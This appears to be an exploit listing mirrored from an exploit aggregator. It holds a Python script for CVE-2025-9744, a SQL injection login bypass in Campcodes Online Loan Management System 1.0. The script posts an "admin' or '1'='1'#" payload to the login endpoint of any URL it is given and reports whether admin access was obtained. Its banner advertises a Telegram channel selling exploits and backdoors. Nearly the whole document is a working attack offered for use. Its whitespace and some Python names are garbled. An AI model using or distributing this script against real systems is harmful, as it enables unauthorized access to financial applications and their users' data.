Exploit for 📄 Campcodes Online Loan Management System 1.0 SQL Injection CVE-2025-9744

## https://sploitus.com/exploit?id=PACKETSTORM:210713
# -*- coding: utf-8 -*-
    # Exploit [Loan Management System] v1.0 - SQL Injection
    # Google Dork: N/A
    # Date: 20/10/2025
    # Exploit Author: CodeB0ss
    # Vendor: Loan Management System
    # Software Link: https://www.loanpro.io/
    # Version: <= 1.0.0
    # Tested on: Windows
    # CVE : CVE-2025-9744
    # CVSS Score : 10
    
    from future import print_function
    import requests
    import sys
    
    banner = '''
    
    -#-
    bY t.me/uncodeboss
    
    CVE-2025-9744 => [Loan Management System] v1.0 - SQL Injection
    
    [Notification] : Become a VP user and get all the exploits and tools,
    backdoors
    t.me/realcodeb0ss . 35% Discount Prefer Code : 9QzkLw
    
    [Usage] :
    python CVE-2025-9744.py -u http/https or just example.com.
    
    '''
    
    try:
    requests.packages.urllib3.disable_warnings()
    except:
    pass
    
    def codeb0ssexp(codeb0ss_base):
    if not codeb0ss_base.startswith("http://") and not
    codeb0ss_base.startswith("https://"):
    codeb0ss_base = "http://" + codeb0ss_base
    base_url = codeb0ss_base.rstrip("/")
    
    cdb0s = requests.Session()
    cdb0s.headers.update({
    'User-Agent': 'Mozilla/5.0 (https://t.me/realcodeb0ss) Gecko/20100101
    Firefox/113.0',
    'Content-Type': 'application/x-www-form-urlencoded'
    })
    red = "\033[91m"
    green = "\033[92m"
    post_path = "/ajax.php?action=login"
    get_path = "/index.php?page=home"
    post_url = base_url + post_path
    get_url = base_url + get_path
    username = "admin'+or+'1'%3D'1'%23"
    password = "expbycodeb0ss"
    payload = "username={}&password={}".format(username, password)
    
    try:
    r_post = cdb0s.post(post_url, data=payload, timeout=10, verify=False)
    r_get = cdb0s.get(get_url, timeout=10, verify=False)
    try:
    combined = (r_post.text or "") + (r_get.text or "")
    except Exception:
    combined = (r_post.content or "") + (r_get.content or "")
    group1 = ["window.start_load", "Welcome back Admin", "Loan Management
    System"]
    group1_ok = all(w in combined for w in group1)
    group2_ok = ("login-form" in combined)
    if group1_ok and group2_ok:
    print(" - " + base_url + " --> " + green + "Vulnerable")
    print(" - {}".format(post_url))
    print(" - {}".format(get_url))
    return 0
    else:
    print(" - " + base_url + " --> " + red + "Not_Vulnerable")
    return 2
    except requests.exceptions.RequestException as e:
    print(" - " + base_url + " --> " + red + "Time0ut")
    return 1
    def startexp():
    if '-u' in sys.argv:
    idx = sys.argv.index('-u')
    if idx + 1 < len(sys.argv):
    return sys.argv[idx + 1]
    return None
    def main():
    print(banner)
    target = startexp()
    if not target:
    sys.exit(1)
    
    rc = codeb0ssexp(target)
    sys.exit(rc)
    if name == "main":
    main()